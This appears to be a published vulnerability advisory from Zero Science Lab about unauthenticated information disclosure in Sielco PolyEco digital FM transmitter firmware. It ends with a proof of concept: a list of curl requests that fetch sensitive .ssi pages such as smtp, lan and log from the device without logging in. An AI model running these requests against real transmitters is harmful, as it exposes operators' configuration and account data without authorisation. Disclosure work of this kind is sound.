Headline
Sielco PolyEco Digital FM Transmitter 2.0.6 Information Disclosure
Sielco PolyEco Digital FM Transmitter version 2.0.6 suffers from an information disclosure vulnerability due to improper access control enforcement. An unauthenticated remote attacker can exploit this issue via a specially crafted request to gain access to sensitive information.
Sielco PolyEco Digital FM Transmitter 2.0.6 Unauthenticated Information DisclosureVendor: Sielco S.r.lProduct web page: https://www.sielco.orgAffected version: PolyEco1000 CPU:2.0.6 FPGA:10.19 PolyEco1000 CPU:1.9.4 FPGA:10.19 PolyEco1000 CPU:1.9.3 FPGA:10.19 PolyEco500 CPU:1.7.0 FPGA:10.16 PolyEco300 CPU:2.0.2 FPGA:10.19 PolyEco300 CPU:2.0.0 FPGA:10.19Summary: PolyEco is the innovative family of high-end digitalFM transmitters of Sielco. They are especially suited as highperformance power system exciters or compact low-mid powertransmitters. The same cabinet may in fact be fitted with 50,100, 300, 500, 1000W power stage (PolyEco50, 100, 300, 500,1000).All features can be controlled via the large touch-screen display4.3" or remotely. Many advanced features are inside by defaultin the basic version such as: stereo and RDS encoder, audiochange-over, remote-control via LAN and SNMP, "FFT" spectralanalysis of the audio sources, SFN synchronization and much more.Desc: Sielco PolyEco is affected by an information disclosurevulnerability due to improper access control enforcement. Anunauthenticated remote attacker can exploit this, via a speciallycrafted request to gain access to sensitive information.Tested on: lwIP/2.1.1 (http://savannah.nongnu.org/projects/lwip)Vulnerability discovered by Gjoko 'LiquidWorm' KrsticMacedonian Information Security Research and Development LaboratoryZero Science Lab - https://www.zeroscience.mk - @zeroscienceAdvisory ID: ZSL-2023-5766Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5766.php26.01.2023--$ curl -s http://RADIOFM/factory.ssi$ curl -s http://RADIOFM/rds.ssi$ curl -s http://RADIOFM/ip.ssi$ curl -s http://RADIOFM/alarm.ssi$ curl -s http://RADIOFM/i2s.ssi$ curl -s http://RADIOFM/time.ssi$ curl -s http://RADIOFM/fft.ssi$ curl -s http://RADIOFM/info.ssi$ curl -s http://RADIOFM/status.ssi$ curl -s http://RADIOFM/statusx.ssi$ curl -s http://RADIOFM/audio.ssi$ curl -s http://RADIOFM/smtp.ssi$ curl -s http://RADIOFM/rf.ssi$ curl -s http://RADIOFM/rfa.ssi$ curl -s http://RADIOFM/ping.ssi$ curl -s http://RADIOFM/lan.ssi$ curl -s http://RADIOFM/kappa.ssi$ curl -s http://RADIOFM/dbrt.ssi$ curl -s http://RADIOFM/audiom.ssi$ curl -s http://RADIOFM/log.ssi